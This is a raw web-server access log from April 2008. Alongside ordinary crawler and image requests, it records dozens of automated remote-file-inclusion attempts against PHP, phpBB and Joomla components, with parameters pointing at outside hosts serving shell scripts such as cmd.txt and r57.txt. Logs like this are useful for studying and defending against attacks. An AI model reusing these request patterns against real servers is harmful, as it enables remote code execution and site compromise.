193.23.172.8 - - [07/Apr/2008:10:34:29 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:34:29 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:34:30 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:10:36:00 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:10:36:01 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:10:36:01 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:10 -0700] "GET /logs/access_070809.log HTTP/1.0" 200 38136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:10 -0700] "GET /logs/access_071121.log HTTP/1.0" 200 61524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:11 -0700] "GET /logs/access_070927.log HTTP/1.0" 200 42324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:11 -0700] "GET /logs/access_070823.log HTTP/1.0" 200 56843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:36:18 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:18 -0700] "GET /logs/access_080325.log HTTP/1.0" 200 2049296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:36:22 -0700] "GET /logs/access_080322.log HTTP/1.0" 200 2017433 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:36:52 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:38:01 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:38:02 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:38:06 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:10:38:24 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:10:38:25 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:10:38:25 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:38:34 -0700] "GET /logs/access_070907.log HTTP/1.0" 200 61100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:10:39:23 -0700] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:10:40:05 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:40:23 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:40:24 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:40:24 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:40:35 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
72.89.191.68 - - [07/Apr/2008:10:40:42 -0700] "GET /logs/access_080225.log//index2.php?x=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.89.191.68 - - [07/Apr/2008:10:40:43 -0700] "GET //index2.php?x=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.89.191.68 - - [07/Apr/2008:10:40:43 -0700] "GET /logs//index2.php?x=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:10:41:27 -0700] "GET /logs/access_080313.log/index1.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:10:41:28 -0700] "GET /index1.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:10:41:28 -0700] "GET /logs/index1.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:10:41:41 -0700] "GET /logs/access_080306.log/index1.php?x=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:45 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:48 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:49 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:50 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:42:59 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:00 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:01 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:02 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:03 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:43:03 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:05 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:43:05 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:05 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:06 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:07 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:08 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:09 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:10 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [07/Apr/2008:10:43:11 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?p=344625#post344625" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:43:31 -0700] "GET /logs/access_070720.log HTTP/1.0" 200 29646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:43:31 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 23344 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.89.191.68 - - [07/Apr/2008:10:43:35 -0700] "GET /logs/access_080131.log//index2.php?x=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [07/Apr/2008:10:43:52 -0700] "GET /logs/access_080306.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:10:45:01 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:10:45:01 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:45:14 -0700] "GET /logs/access_080329.log/index.php?sayfa=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:45:16 -0700] "GET /index.php?sayfa=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:45:17 -0700] "GET /logs/index.php?sayfa=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:10:45:49 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:46:11 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:46:13 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:46:13 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:46:14 -0700] "GET /logs/access_080226.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:46:25 -0700] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:46:38 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:46:41 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:46:56 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:47:16 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:48:16 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:10:48:32 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:10:48:35 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:10:48:36 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:49:31 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:49:36 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:10:50:12 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.215.233 - - [07/Apr/2008:10:50:36 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.233 - - [07/Apr/2008:10:50:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.233 - - [07/Apr/2008:10:50:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.233 - - [07/Apr/2008:10:50:37 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:50:59 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:51:00 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:51:01 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:51:02 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:51:04 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:51:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:51:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
